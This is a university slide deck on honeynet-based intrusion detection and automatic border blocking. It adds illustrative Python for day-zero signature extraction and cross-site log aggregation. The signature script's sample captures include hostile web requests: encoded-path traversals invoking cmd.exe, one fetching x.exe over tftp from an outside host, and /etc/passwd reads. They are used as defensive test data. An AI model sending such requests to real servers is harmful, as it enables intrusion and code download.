Advanced Attack Detection and Infrastructure Protection
Sean Ensz – OU IT Security Analyst
Sallie Wright – OSU IT Security Officer
Dr. Mark Weiser – OSU Director of CTANS
Agenda
• Technical Overview – Sean Ensz
• Production Benefits – Sallie Wright
• Research Benefits – Dr. Mark Weiser
Technical Overview
• Core system based on a Honeynet design
  – A Honeynet is a network of honeypots
  – A honeypot is an information system resource whose value lies in illicit use of that resource
  – A honeypot has no legitimate users
  – Any traffic going to or from the system is inherently suspicious
*Source: www.honeynet.org
[Diagram: honeynet hardware layout. A VMware ESX host runs the honeypots (six shown), connected through a Foundry Networks EdgeIron 24G switch. The Honeywall sits in front of the honeypots as a Layer 2 bridge; the switch carries a VLAN trunk for honeypot traffic, a separate management VLAN trunk, and a link to the Local DB switch.]
[Diagram: logging pipeline]
  Log Generators: Network Traffic (Net Switch, Honeywall) and Hosts
  Log Subsystems: Snort, IPTables, pcap, Evt Logs, Sebek, HIDS, Flow Data
  Log Collectors: MySQL Local DB → Export Tables → MySQL Central DB
  Actions (Local DB): Rebuild Honeypot, Assign Initial Severity, Export
  Actions (Central DB): Increase Severity, Add to Null Route Table, Store
Future Improvements
• Honeywall
  – Needs better hardware & network driver support
  – Beta version to be released today
• Host based logging
  – Currently relies on Sebek
  – Lacks host log and process tree support
  – Working with Third Brigade to develop a honeypot version of their product
Production Benefits
OSU IT Systems Security Evolution (timeline diagram):
  2000: No real security program – WIDE OPEN
  2001-2002: IT Security Office – policy focus, central anti-virus
  2003-2004: IDS, border firewall, IT Security Plan, LaBrea Tarpit
  2005: Anti-spam, Intrusion Prevention System, AIPS
AIPS Production Benefits
• Identification of malicious hosts
• Ability to block at the border of Oklahoma's OneNet state-wide network
Collaboration
• A key benefit is the ability to provide academic programs with tools to research and develop new ways to strengthen overall IT security.
Production Goal
• To contain and prevent intrusions while providing the data flow analysis needed to tune the IT security process.
Research Benefits
• How This May Be Extended
  – Future Research
  – Related Endeavors
Day Zero Signature
[Diagram: Existing Signatures, Candidate Detects, HN Design Attacks and HN Wild Attacks feed Day Zero Signature generation, using AI/Neural Nets and Other Methods, followed by Validation.]
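The slide only names the boxes. As an added example (not the authors' code, and not their AI/neural-net method), the script below walks the same path with the simplest possible technique: honeynet captures that no existing signature explains become candidate detects, the longest byte string they share becomes a proposed signature, and the proposal is validated against benign traffic before it is accepted. The signatures, captured payloads and benign corpus are all constructed for this example.

```python
"""Candidate day-zero signature extraction from honeynet captures.

Illustrative example only; not the OU/OSU AIPS implementation.
All payloads, signatures and benign requests below are constructed.
"""
import re
from itertools import combinations

# Constructed stand-ins for the "Existing Signatures" box: anything these
# already match is explained and is therefore not a day-zero candidate.
EXISTING_SIGNATURES = [
    re.compile(rb"/cgi-bin/phf\?"),
    re.compile(rb"\.\./\.\./\.\./etc/passwd"),
]

# Constructed "HN Wild Attacks": requests captured on honeypots. Honeypots
# have no legitimate users, so every request is treated as hostile.
HONEYNET_PAYLOADS = [
    b"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0",
    b"GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    b"GET /_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i+10.0.0.9+GET+x.exe HTTP/1.0",
    b"GET /index.html?../../../etc/passwd HTTP/1.0",
]

# Constructed benign traffic for the "Validation" step (zero hits required).
BENIGN_CORPUS = [
    b"GET /index.html HTTP/1.1",
    b"GET /images/logo.png HTTP/1.1",
    b"POST /login HTTP/1.1",
    b"GET /scripts/app.js HTTP/1.1",
]

MIN_SIG_LEN = 12  # assumed floor; shorter shared strings are usually noise


def candidate_detects(payloads, signatures):
    """Keep only payloads that no existing signature matches."""
    return [p for p in payloads if not any(s.search(p) for s in signatures)]


def longest_common_substring(strings):
    """Brute-force LCS over a small set of byte strings; b"" if none."""
    if not strings:
        return b""
    shortest = min(strings, key=len)
    for length in range(len(shortest), 0, -1):
        for start in range(len(shortest) - length + 1):
            sub = shortest[start:start + length]
            if all(sub in s for s in strings):
                return sub
    return b""


def propose_signature(candidates, benign, min_len=MIN_SIG_LEN):
    """Largest group of candidates sharing a long substring that never
    appears in benign traffic. Returns (pattern_bytes, covered_payloads)."""
    best = (b"", [])
    # Larger groups first: one signature covering many attacks is preferred.
    for size in range(len(candidates), 1, -1):
        for group in combinations(candidates, size):
            sub = longest_common_substring(list(group))
            if len(sub) < min_len:
                continue
            if any(sub in b for b in benign):  # validation: no false positives
                continue
            if len(group) > len(best[1]) or (
                    len(group) == len(best[1]) and len(sub) > len(best[0])):
                best = (sub, list(group))
        if best[1]:
            break
    return best


def to_regex(sig):
    """Escape the proposed bytes so they can go straight into a rule file."""
    return re.compile(re.escape(sig))


if __name__ == "__main__":
    cands = candidate_detects(HONEYNET_PAYLOADS, EXISTING_SIGNATURES)
    sig, covered = propose_signature(cands, BENIGN_CORPUS)
    print(f"{len(cands)} unexplained captures, proposed signature: {sig!r}")
    print(f"covers {len(covered)} captures, 0 benign hits")
```

The two traversal-style requests that existing rules already cover drop out at the first step; the three remaining captures share a 40-byte encoded-path fragment that is absent from the benign set, so it is emitted as the candidate. A real pipeline would replace the substring step with whatever the "AI/Neural Nets" and "Other Methods" boxes stand for, but the filter-then-validate shape stays the same.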
MiddleWare
[Diagram: a Honeynet "Solution" produces a platform-neutral solution (file); Middleware, given Router Description / Access Information, turns it into configuration for the Router/Firewall.]
Basic Near-Real-Time Activity Detector
• Low-cost log gathering w/ local analysis
• Central Cumulative Analysis
• Trigger points distribute alerts to subscribers
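The three bullets above describe the same architecture as the logging-pipeline diagram in the Technical Overview: sensors feed a local collector that assigns an initial severity and exports rows, a central store accumulates severity per source across sites, and crossing a trigger point adds the source to the null-route table and alerts subscribers. The script below is an added illustration of that flow serving both slides; it is not the AIPS code. The Snort fast-alert and iptables lines, the site names, the severity weights and the threshold are all constructed or assumed for the example.

```python
"""Local collection, central cumulative analysis and trigger points.

Added illustration of the honeynet logging pipeline; not the AIPS code.
Log lines, site names, weights and the threshold are constructed.
"""
import re
from collections import defaultdict

# Constructed sensor records as a local collector would receive them: a Snort
# fast-alert line plus iptables LOG lines from the Honeywall bridge. Every
# destination is a honeypot, so every line is suspicious by definition.
SITE_A_LOGS = [
    "05/12-14:03:11.120000  [**] [1:1234:5] WEB-IIS cmd.exe access [**] "
    "[Priority: 1] {TCP} 198.51.100.7:44021 -> 10.10.1.5:80",
    "May 12 14:03:15 honeywall kernel: INBOUND TCP: IN=br0 OUT=br0 "
    "SRC=198.51.100.7 DST=10.10.1.6 LEN=60 PROTO=TCP SPT=44022 DPT=445",
    "May 12 14:04:02 honeywall kernel: INBOUND TCP: IN=br0 OUT=br0 "
    "SRC=203.0.113.9 DST=10.10.1.5 LEN=60 PROTO=TCP SPT=5000 DPT=22",
]
SITE_B_LOGS = [
    "05/12-14:05:40.300000  [**] [1:1234:5] WEB-IIS cmd.exe access [**] "
    "[Priority: 1] {TCP} 198.51.100.7:51000 -> 10.20.1.5:80",
]

SNORT_RE = re.compile(
    r"\[Priority: (?P<prio>\d)\] \{(?P<proto>\w+)\} "
    r"(?P<src>\d+\.\d+\.\d+\.\d+):\d+ -> (?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)")
IPT_RE = re.compile(
    r"SRC=(?P<src>\d+\.\d+\.\d+\.\d+) DST=(?P<dst>\d+\.\d+\.\d+\.\d+) "
    r".*?PROTO=(?P<proto>\w+) .*?DPT=(?P<dport>\d+)")

NULL_ROUTE_THRESHOLD = 6  # assumed trigger point for this example


def parse_event(line):
    """Normalise one sensor line. Initial severity (assumed weights):
    Snort priority 1 -> 3, priority 2 -> 2, otherwise 1; a bare
    iptables connection record -> 1. Returns None for unknown formats."""
    m = SNORT_RE.search(line)
    if m:
        sev = {"1": 3, "2": 2}.get(m["prio"], 1)
        return {"src": m["src"], "dst": m["dst"], "dport": int(m["dport"]), "severity": sev}
    m = IPT_RE.search(line)
    if m:
        return {"src": m["src"], "dst": m["dst"], "dport": int(m["dport"]), "severity": 1}
    return None


def local_collect(site, lines):
    """Local DB stage: parse, assign initial severity, build export rows."""
    rows = []
    for line in lines:
        ev = parse_event(line)
        if ev:
            rows.append({"site": site, **ev})
    return rows


class CentralDB:
    """Central DB stage: cumulative severity per source, null-route table,
    and subscriber notification when a trigger point is crossed."""

    def __init__(self, threshold=NULL_ROUTE_THRESHOLD):
        self.threshold = threshold
        self.severity = defaultdict(int)   # src -> summed initial severity
        self.sites = defaultdict(set)      # src -> sites that reported it
        self.targets = defaultdict(set)    # src -> honeypots it touched
        self.null_routes = []              # ordered null-route table
        self.subscribers = []              # callables taking (src, score)

    def subscribe(self, fn):
        self.subscribers.append(fn)

    def score(self, src):
        # "Increase Severity": a source reported by several sites, or touching
        # several honeypots, is scanning rather than stumbling in. Weights assumed.
        return (self.severity[src]
                + 2 * (len(self.sites[src]) - 1)
                + (len(self.targets[src]) - 1))

    def ingest(self, rows):
        for r in rows:
            src = r["src"]
            self.severity[src] += r["severity"]
            self.sites[src].add(r["site"])
            self.targets[src].add(r["dst"])
            s = self.score(src)
            if s >= self.threshold and src not in self.null_routes:
                self.null_routes.append(src)        # "Add to Null Route Table"
                for fn in self.subscribers:          # trigger point -> subscribers
                    fn(src, s)


def null_route_commands(db):
    """Render the table as iproute2 blackhole routes; the production system
    blocks at the OneNet border instead, this is the generic Linux form."""
    return [f"ip route add blackhole {src}/32" for src in db.null_routes]


def run_demo():
    """Wire the stages together over the constructed logs."""
    alerts = []
    db = CentralDB()
    db.subscribe(lambda src, s: alerts.append((src, s)))
    db.ingest(local_collect("site-A", SITE_A_LOGS))
    db.ingest(local_collect("site-B", SITE_B_LOGS))
    return db, alerts


if __name__ == "__main__":
    db, alerts = run_demo()
    print("alerts:", alerts)
    print("\n".join(null_route_commands(db)))
```

After site A alone, 198.51.100.7 scores 5 (two honeypots, one site) and stays below the threshold; the single Snort hit from site B lifts it to 11, which is what the central cumulative view adds over either site's local analysis. The source that touched one honeypot once (203.0.113.9) is stored but never null-routed, which is the behaviour you want if the border block is automatic.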